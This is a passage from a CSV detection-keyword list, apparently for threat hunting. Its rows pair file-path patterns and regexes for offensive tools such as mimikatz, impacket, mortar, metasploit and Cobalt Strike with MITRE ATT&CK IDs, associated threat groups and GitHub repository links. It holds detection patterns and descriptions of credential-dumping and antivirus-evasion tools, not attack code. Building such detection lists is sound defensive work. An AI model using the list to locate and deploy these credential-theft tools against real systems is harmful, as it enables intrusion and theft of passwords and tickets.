Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8819" "*/mimidrv.sys*",".{0,1000}\/mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8820" "*/mimidrv.zip*",".{0,1000}\/mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8821" "*/mimikatz.bin*",".{0,1000}\/mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8822" "*/mimikatz.enc*",".{0,1000}\/mimikatz\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8823" "*/mimikatz.exe*",".{0,1000}\/mimikatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","mimikatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8824" "*/mimikatz.git*",".{0,1000}\/mimikatz\.git.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz github link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - 
Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8825" "*/mimikatz.py*",".{0,1000}\/mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8826" "*/mimikatz.py*",".{0,1000}\/mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","8827" "*/mimikatz.sln*",".{0,1000}\/mimikatz\.sln.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8828" "*/mimikatz/archive/master.zip*",".{0,1000}\/mimikatz\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - 
PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8829" "*/mimikatz/releases/*",".{0,1000}\/mimikatz\/releases\/.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8830" "*/mimikatz/zipball/*",".{0,1000}\/mimikatz\/zipball\/.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - 
APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8831" "*/mimikatz_bypass/mimikatz.py*",".{0,1000}\/mimikatz_bypass\/mimikatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8832" "*/mimikatz_bypass/mimikatz2.py*",".{0,1000}\/mimikatz_bypass\/mimikatz2\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8833" "*/mimikatz_bypassAV/main.exe*",".{0,1000}\/mimikatz_bypassAV\/main\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8834" "*/mimikatz_bypassAV/mimikatz_load.exe*",".{0,1000}\/mimikatz_bypassAV\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8835" "*/mimikatz_load.exe*",".{0,1000}\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8836" "*/mimilib.def*",".{0,1000}\/mimilib\.def.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8837" "*/mimilib.dll*",".{0,1000}\/mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","8838" "*/mimilove.c*",".{0,1000}\/mimilove\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8839" "*/mimilove.h*",".{0,1000}\/mimilove\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8840" "*/mimilove.rc*",".{0,1000}\/mimilove\.rc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8841" "*/mimipenguin.*",".{0,1000}\/mimipenguin\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8842" "*/mimipenguin.c*",".{0,1000}\/mimipenguin\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 